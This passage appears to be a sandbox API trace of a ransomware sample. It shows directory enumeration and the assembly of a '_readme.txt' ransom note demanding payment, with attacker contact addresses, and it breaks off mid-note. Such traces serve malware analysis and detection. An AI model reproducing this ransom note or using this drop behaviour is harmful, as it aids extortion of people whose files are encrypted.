(HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3e0 [0165.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c408 [0165.497] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.498] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c250 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.498] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.498] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c408 [0165.498] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16c) returned 0x3b424b0 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3e0 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c278 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4d0 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4f8 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c520 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c548 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c570 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c598 [0165.499] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.499] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.499] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.500] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0165.500] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x214) returned 0x3b44498 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c250 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c5c0 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c5e8 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c688 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6b0 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.500] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.500] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.500] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c408 [0165.501] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c598 [0165.501] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c570 [0165.501] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x310) returned 0x3b446b8 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c548 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c520 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4f8 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4d0 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c278 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2c8 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3e0 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c700 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c728 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c750 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c778 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c7a0 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c7c8 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c7f0 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c818 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c840 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c868 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c890 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8b8 [0165.501] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c598 [0165.502] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c408 [0165.502] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.502] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.502] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0165.502] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.502] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.502] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.502] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.502] PathFindFileNameW (pszPath="") returned="" [0165.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.502] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.503] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.503] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.503] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0165.503] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0165.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0165.504] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0165.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b449d0 [0165.504] lstrcpyW (in: lpString1=0x3b449d0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your 